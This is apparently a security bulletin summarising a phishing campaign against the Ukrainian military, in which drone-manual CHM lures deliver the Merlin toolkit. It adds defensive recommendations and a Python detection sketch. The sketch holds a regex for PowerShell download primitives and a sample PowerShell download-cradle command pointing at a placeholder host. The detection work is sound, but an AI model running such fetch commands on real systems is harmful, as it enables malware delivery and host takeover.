Ukrainian Military Targeted in Phishing Campaign Leveraging Drone Manuals
Cyber Security Threat Summary:
“Ukrainian military entities are the target of a phishing campaign that leverages drone manuals as lures to deliver a Go-based open-source post-exploitation toolkit called Merlin. ‘Since drones or Unmanned Aerial Vehicles (UAVs) have been an integral tool used by the Ukrainian military, malware-laced lure files themed as UAVs service manuals have begun to surface,’ Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News. The cybersecurity company is tracking the campaign under the name STARK#VORTEX. The starting point of the attack is a Microsoft Compiled HTML Help (CHM) file that, when opened, runs malicious JavaScript embedded inside one of the HTML pages to execute PowerShell code designed to contact a remote server to fetch an obfuscated binary. The Windows-based payload is decoded to extract the Merlin Agent, which, in turn, is configured to communicate with a command-and-control (C2) server for post-exploitation actions, effectively seizing control over the host.”
Security Officer Comments:
Merlin has been used in the past to target Ukrainian government organizations. For instance, just last month, Ukraine’s Computer Emergency Response Team disclosed a similar attack chain that employs CHM files as decoys to infect computers with the open-source tool. For its part, Merlin comes with a wide range of capabilities, making it a popular alternative to post-exploitation tools like Cobalt Strike and Sliver. Some of the capabilities of Merlin include:
- Encrypted C2 communication using TLS
- Remote command shell
- Module support (such as Mimikatz)
- Binary support for exe or dll clients
Always be extra cautious when downloading file attachments from posts or private messages. When it comes to prevention and detection, the Securonix Threat Research Team recommends:
- Avoid downloading files or attachments from untrusted sources, especially if the source was unsolicited
- Monitor common malware staging directories, especially “C:\ProgramData” and other temporary locations such as the user’s local appdata folder, which was used in this attack campaign
- Deploy additional process-level logging such as Sysmon and PowerShell logging for additional log detection coverage
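As an added example (not code from the Securonix report or the article), the following Python sketch turns those three recommendations into detection logic and runs it over constructed Sysmon-style events: PowerShell spawned from the CHM viewer, a download cradle on the PowerShell command line, and an executable written to a staging directory. It assumes hh.exe, the Windows HTML Help viewer, is the parent process when a CHM lure launches PowerShell; all paths, hostnames and event records are placeholders.

```python
import re
from typing import Dict, List

# Staging locations named in the Securonix recommendations (lower-cased).
STAGING_DIRS = ("c:\\programdata\\", "\\appdata\\local\\")
# Assumption: hh.exe (the Windows HTML Help viewer) opens the .chm lure,
# so it appears as the parent of the PowerShell process.
CHM_HOST = "hh.exe"
# Common PowerShell/.NET primitives a fetch stage uses to pull a payload.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|\biwr\b", re.I)


def classify(ev: Dict) -> List[str]:
    """Return the detection labels that fire for one Sysmon-style event."""
    hits: List[str] = []
    if ev["EventID"] == 1:  # process creation
        image = ev["Image"].lower()
        parent = ev.get("ParentImage", "").lower()
        if image.endswith("powershell.exe"):
            if parent.endswith(CHM_HOST):
                hits.append("chm_spawned_powershell")
            if DOWNLOAD_RE.search(ev.get("CommandLine", "")):
                hits.append("powershell_download")
    elif ev["EventID"] == 11:  # file creation
        target = ev["TargetFilename"].lower()
        if target.endswith((".exe", ".dll")) and any(d in target for d in STAGING_DIRS):
            hits.append("binary_dropped_in_staging_dir")
    return hits


def scan(events: List[Dict]) -> Dict[str, List[int]]:
    """Map each label to the indices of the events that triggered it."""
    report: Dict[str, List[int]] = {}
    for i, ev in enumerate(events):
        for label in classify(ev):
            report.setdefault(label, []).append(i)
    return report


# Constructed sample telemetry (not real logs): a benign launch, the lure
# chain, a dropped binary, and a harmless document in a staging directory.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\hh.exe",
     "CommandLine": "powershell.exe -c Invoke-WebRequest http://EXAMPLE-PLACEHOLDER/stage"},
    {"EventID": 11, "TargetFilename": "C:\\Users\\u\\AppData\\Local\\Temp\\svc.exe"},
    {"EventID": 11, "TargetFilename": "C:\\ProgramData\\report.pdf"},
]
```

Calling `scan(SAMPLE_EVENTS)` flags only the PowerShell launch (both labels) and the dropped `svc.exe`; in a real deployment the same three checks map directly onto Sysmon Event ID 1 and 11 fields plus PowerShell script block logging.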
https://www.securonix.com/blog/
https://thehackernews.com/2023/09/ukrainian-military-targeted-in-phishing.html